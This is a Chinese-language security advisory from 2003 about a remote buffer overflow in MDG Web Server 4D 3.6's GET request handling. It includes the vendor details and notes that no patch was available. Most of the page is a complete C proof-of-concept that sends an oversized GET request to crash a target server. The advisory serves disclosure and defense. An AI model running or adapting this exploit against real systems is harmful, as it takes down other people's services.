首页 -> 安全研究
安全研究
安全漏洞
MDG Web Server 4D GET命令远程缓冲区溢出漏洞
发布日期:2003-05-01
更新日期:2003-05-07
受影响系统:
MDG Computer Services Web Server 4D/eCommerce 3.6描述:
BUGTRAQ ID: 7479
MDG Web Server是一款集成数据库的HTTP服务程序。
MDG Web服务程序在处理GET请求时缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞对WEB服务进行拒绝服务攻击,可能以WEB进程权限在系统上执行任意指令。
攻击者提交超过4096字节的GET /请求,可导致服务程序出现运行错误,问题是由于缓冲区溢出触发,可能以WEB进程权限在系统上执行任意指令。
<*来源:badpack3t (badpack3t@security-protocols.com)
链接:http://www.security-protocols.com/article.php?sid=1493&mode=thread&order=0
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Web Server 4D 3.6.0 DoS
*
* Vulnerable systems:
* Web Server 4D 3.6.0 DoS
* Vendor:
* http://www.mdg.com/
*
* Download it here:
* ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
*
* Written and found by badpack3t
* For SP Research Labs
* 04/29/2003
*
* www.security-protocols.com
*
* usage:
* sp-ws4d [targetport] (default is 80)
*
* Greets: c0nnie.
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET /<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< HTTP/1.1 ";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target, buffer[30000];
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("Web Server 4D 3.6.0 DoS ", argv[0]);
printf("Tool Usage: %s [targetport] (default is 80) ", argv[0]);
printf("www.security-protocols.com ", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
//for default web attacks
port = 80;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error! ");
exit(1);
}
printf("Resolving Hostnames... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed ", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting... ");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host. ");
exit(1);
}
printf("Connected!... ");
printf("Sending Payload... ");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload ");
closesocket(mysocket);
exit(1);
}
printf("Remote Webserver has been DoS'ed ");
closesocket(mysocket);
WSACleanup();
return 0;
}
建议:
厂商补丁:
MDG Computer Services
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mdg.com/
浏览次数:2876
严重程度:0(网友投票)
绿盟科技给您安全的保障